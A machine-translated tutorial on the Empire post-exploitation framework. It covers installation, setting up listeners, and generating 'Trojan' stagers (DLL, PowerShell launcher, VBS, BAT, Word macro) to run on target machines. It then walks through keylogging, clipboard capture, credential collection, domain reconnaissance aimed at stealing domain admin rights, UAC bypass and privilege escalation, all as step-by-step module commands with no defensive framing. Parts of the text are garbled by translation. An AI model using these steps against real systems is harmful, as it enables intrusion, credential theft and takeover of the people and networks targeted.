installation
git command download
git clone https://github.com/EmpireProject/Empire.git
Then enter the setup directory and install Empire
cd Empire
cd setup
sudo ./install.sh
But there will be an error
Traceback (most recent call last):
File "./empire", line 13, in <module>
from lib.common import empire, helpers
File "/root/Empire/lib/common/__init__.py", line 8, in <module>
import helpers
File "/root/Empire/lib/common/helpers.py", line 50, in <module>
import iptools
ImportError: No module named iptools
Here are a few packages missing, just download it
pip install iptools
pip install pydispatch
pip install netifaces
pip install pydispatcher
pip install zlib_wrapper
pip install xlrd
pip install macholib
pip install xlutils
pip install pyminifier
pip install dropbox
Just reset it after installation
cd setup/
sudo ./reset.sh
Help document
Set up monitor
Empire and Meterpreter use the same principle. They both set up a monitor first, then generate a Trojan horse, and then run the Trojan horse on the target host, and our monitor will connect to the agent that bounces back.
Use the listeners command to enter the monitoring thread interface, then enter userlistener to set which mode, enter userlistener+space, and then double-click the Tab key to see that there are a total of modes.
Here use http monitoring mode, enter info to view the specific parameter settings,
use the set command to set the corresponding Parameter, and then use the execute command to start listening.
Use the list command to list the currently active listeners.
Use the kill command to delete the listener.
When multiple listeners are enabled, different names and different ports must be used.
Generate Trojan
After setting up the monitoring, the Trojan horse will be generated and then run on the target machine. It can be understood that there are multiple modular stagers in Payload and Empire in Metasploit, and then enter usestager to set which module to use. Similarly, by double-clicking the Tab key, you can see a total of 26 modules.
- DLL Trojan
usestager windows/dll
Enter the info command to view the detailed parameters. After setting the parameters, and then execute the execute command, a Trojan named launch.dll will be generated in the tmp directory. After launch runs on the target host, it will go online successfully
2. Launcher
if it only needs simple After setting the corresponding module, you can directly type it in the listener menu, launcher<language><listenerName>
and a line of base64 encoding code will be generated soon. Here, enter the back command to return to the listener, and then enter the launch powershell test (listener name currently set) command To generate a payload
and then execute the generated command on the target machine with PowerShell, you will get the permission of this host.
You can see that two hosts are already online.
Enter the agent to see the specific content of the online host.
Use rename to modify the name
-
launch_vbs Trojan
Under the listener monitoring, enter usestager windows/launcher_vbs, and then enter and exit the info command to view the detailed parameters.
Then set the listener parameters. By default, a launcher.vbs will be generated in the /tmp directory.
Finally, enter the back command and return to the listener to start monitoring. When the generated launcher.vbs is opened on the target machine, the permission of this host will be obtained.
-
launch_bat Trojan
Use the command usestager windows/launcher_bat
to generate a launcher.bat file in the tmp directory by default, run it on the target machine, and you will get the permission of the host
-
The Macro Trojan
will generate a macro in the tmp directory by default. Then you need to add the generated macro to an office document. Open a Word document, click the "View" tab, click "Macro", click "View Macro", give the macro a name, and then create the macro. After
clicking Create, the VB editing interface will pop up. Delete the original code and generate Copy the macros in and
save the document as a "Word 97-2003 document (*.doc)" file. Execute the file on the target machine to get the permission of the host
Connect to the host and basic use
After the target host bounces successfully, the agents command can view the currently connected hosts, and the ones with * are the hosts that have been elevated.
Use the interact command to connect to the host.
Enter help agentcmds to see the common commands available for use.
When using some CMD commands , You need to use the format of shell+command.
Like Metasploit, the creds command can automatically filter and sort out the obtained user passwords.
collect message
Empire is mainly used for post infiltration. Therefore, information collection is a commonly used module. You can use the search module command to search for the modules that need to be used. Here, use the command usemodule collection and then Tab to view the complete list.
- Screenshots
2. Keylogger
At this time, you can see the keylogger in the target machine in Empire
While automatically empire/downloads/<AgentName>
generate the next file agent.log
-
Clipboard record
After execution, you will see the clipboard record
-
Find shares
usemodule situational_awareness/network/powerview/share_finder
- Collect information about the target host
usemodule situational_awareness/host/winenum
You can view local users, domain group members, last password setting time, clipboard content, basic system information, network adapter information, shared information, etc.
usemodule situational_awareness/host/computerdetails
Almost all useful information in the system is enumerated, such as target host event log, application control policy log, including RDP login information, information about PowerShell script running and saving
- ARP scan
usemodule susemodule situational_awareness/network/arpscan
Here you need to set the Range parameter
- DNS information acquisition In the
internal network, knowing the HostName and corresponding IP addresses of all machines is essential for analyzing the internal network structure
usemodule situational_awareness/network/reverse_dns
usemodule situational_awareness/host/dnsserver #显示当前内网DNS服务器的IP地址
- Find the domain management login server IP
. In order to obtain the domain management authority of a server in the intranet, one of the methods is to find the machine where the domain management logs in, and then infiltrate it horizontally to steal the domain management authority. Down the entire domain.
usemodule situational_awareness/network/powerview/user_hunter
- Local management group access module
usemodule situational_awareness/network/powerview/find_localadmin_access
10. Get a domain controller
usemodule situational_awareness/network/powerview/get_domain_controller
Privilege escalation
- Bypass UAC,
we escalate the rights of Test in the figure
usemodule privesc/bypassuac
Set the Listener parameters, and then run it. I
found that a new bounce was successfully launched. When I returned to the agent, I found that there was an asterisked agent that had been
elevated. 2.
The principle of bypassuac_wscript is to use C:\Windows\wscript.exe Payload, that is, to bypass UAC to implement Payload with administrator privileges, is only applicable to Win7 target hosts.
usemodule privesc/bypassuac_wscript
-
PowerUp
Empire has built-in some PowerUp tools for system privilege escalation, mainly including Windows system misconfiguration vulnerabilities, Windows Services vulnerabilities, AlwaysInstallElevated vulnerabilities and other 8 privilege escalation methods. Enter usemodule privesc/powerup/ and press Tab to view the complete list of PowerUp.
-
GPP
often enables group policy preferences in the domain to change the local password, which is convenient for managing and deploying images. The disadvantage is that any ordinary domain user can read the deployment information from the relevant domain controller SYSVOL. GPP is encrypted with AES 256,usemodule privesc/gpp
you can view it by typing in the command